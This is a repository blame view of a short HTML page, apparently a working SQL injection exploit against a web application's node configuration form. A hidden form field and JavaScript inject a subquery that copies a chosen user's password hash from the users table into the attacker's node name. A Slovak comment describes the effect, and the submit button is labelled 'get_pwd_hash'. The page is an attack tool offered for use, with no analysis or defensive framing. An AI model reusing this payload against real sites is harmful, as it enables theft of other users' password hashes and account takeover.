Commit | Line | Data |
---|---|---|
e586807d H |
1 | <!-- |
2 | This program is free software. It comes without any warranty, to | |
3 | the extent permitted by applicable law. You can redistribute it | |
4 | and/or modify it under the terms of the Do What The Fuck You Want | |
5 | To Public License, Version 2, as published by Sam Hocevar. See | |
6 | http://sam.zoy.org/wtfpl/COPYING for more details. | |
7 | --> | |
8 | ||
9 | <html> | |
10 | <head> | |
11 | <title>node_system_access sql injection</title> | |
12 | <meta http-equiv="Cache-Control" content="Public"> | |
13 | <meta http-equiv="Content-Type" content="text/html; charset=windows-1250"> | |
14 | <link rel="shortcut icon" href="/id/1459933/download"> | |
15 | <link rel='stylesheet' type='text/css' href='/id/1126515/download'> | |
16 | </head> | |
17 | ||
18 | <body> | |
19 | <script type="text/javascript"> | |
20 | function access_node_system(what) | |
21 | { | |
22 | var id = document.getElementById('user_id').value; | |
23 | if(!isNaN(id)) { | |
24 | document.getElementById('node_system_access').value = "public', node_name=(select password from users where user_id='"+id+"'), node_parent='"; | |
25 | what.submit(); | |
26 | } | |
27 | } | |
28 | </script> | |
29 | nastavi tvoj system_access na 'public', tvoj node_name na hash of desired id's pwd a tvojho parenta na '' | |
30 | <br> | |
31 | <noscript>javascript not enabled, user_id defaults to {$user_id}</noscript> | |
32 | <form method="post" enctype="multipart/form-data" action="/id/{$user_id}/"> | |
33 | <input type="hidden" name="node_system_access" id="node_system_access" value="public', node_name=(select password from users where user_id='{$user_id}'), node_parent='"> | |
34 | <input type="hidden" name="event" value="configure_system_access"> | |
35 | <script type="text/javascript"> | |
36 | document.write("<input type="text" size="7" name="user_id" id="user_id" value="{$user_id}">"); | |
37 | </script> | |
38 | <input type="submit" value="get_pwd_hash" onclick="access_node_system(this);return false"> | |
39 | </form> | |
40 | ||
41 |